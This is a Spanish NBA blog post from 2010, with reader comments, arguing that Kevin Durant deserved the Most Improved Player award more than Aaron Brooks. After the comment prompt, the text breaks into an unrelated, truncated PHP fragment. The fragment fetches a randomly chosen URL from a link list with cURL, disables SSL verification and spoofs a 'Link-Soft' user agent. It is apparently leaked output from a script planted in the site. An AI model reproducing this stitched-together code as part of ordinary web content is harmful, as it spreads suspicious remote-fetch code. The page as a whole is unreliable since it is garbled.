Aaron Brooks se lleva el MIP

23 de April de 2010 por txusma

El jugador de los Houston Rockets, Aaron Brooks, se ha llevado el MIP casi por unanimidad dejando a otros 3 jugadores empatados en la segunda posición y a mucha distancia. De hecho ha recibido 403 puntos  de un máximo de 615 lo que demuestra la contundencia con la que se ha llevado el premio.

Brooks, que era el máximo favorito para llevarse el galardón, ha cuajado su mejor temporada desde que aterrizó en la liga en la temporada 2007-2008 consiguiendo sus mejores promedios tanto en puntos (19.6), asistencias (5.3) e incluso rebotes (2.6). Lo que la nota de prensa no dice es que Aaron Brooks también ha jugado este año 10 minutos más que el año pasado. Con una pequeña tabla podríamos poner en duda la elección con tanta diferencia del menudo base de los Rockets comparando sus registros con los 3 jugadores que han quedado en segunda posición (Durant, Hill y Marc Gasol) y alguno más:

Refiriéndonos a la eficiencia en 48 minutos de esta temporada y la anterior:

2008-2009 2009-2010 Dif
Aaron Brooks 17.49 21.29 3.8
Kevin Durant 27.97 33.98 6.01
George Hill 17.77 20.03 2.26
Marc Gasol 24.77 28.36 3.59
Luke Ridnour 20.3 24.65 4.35
Andrew Bogut 28.24 31.89 3.65

Rápidamente salta a la vista que Brook no es el jugador que más ha mejorado en cuanto a eficiencia por minuto de la liga y aunque esta medida siempre ha de ser puesta en cuarentena, si tenemos en cuenta otros aspectos como cambios de rol, cambios de entrenador, cambio de equipo, etc… nos puede ofrecer una comparativa acertada. Por eso, para mí el jugador que más se merecía el título era sin duda Kevin Durant que jugando los mismos minutos por partido anota más y rebotea más y además el paso adelante que ha realizado sitúandose como una de las estrellas de la liga y llevando a su equipo a los Playoffs es importantísimo. Tal vez el hecho de ser considerado este un premio menor y que Durant ya viniera de muy arriba hayan pesado a la hora de las votaciones.

Comenta

3 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    A mi no me gusta demasiado Brooks, creo que lo ha tenido todo de cara este año, que no es base titular para un equipo con un anotador exterior como Kevin Martin y desde luego no es el indicado para sustir de balones a Yao.

    En fin, para mi un jugador bastante sobrevalorado.

      Citar

  2. Uno cualquiera dice:
    #2

    Ahora puedo hacer como los de cualquier periódicodeportivorandomdeEspaña y decir…

    “Como ya adelantó “Uno cualquiera”…”

    (Y también puedo fallar 50 veces, pero de esas me olvido, que se estila mucho por el periodismo español 😎 )

      Citar

  3. NBA LAKERS BLOG dice:
    #3

    Yo coincido con el premio, se lo merecía mucho. Trabajo muy duro, y ha hecho unos números muy buenos a lo largo de la temporada.

    Te espero por nuestro blog de los Lakers 😉

    Un fuerte abrazo!

    -NM-

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>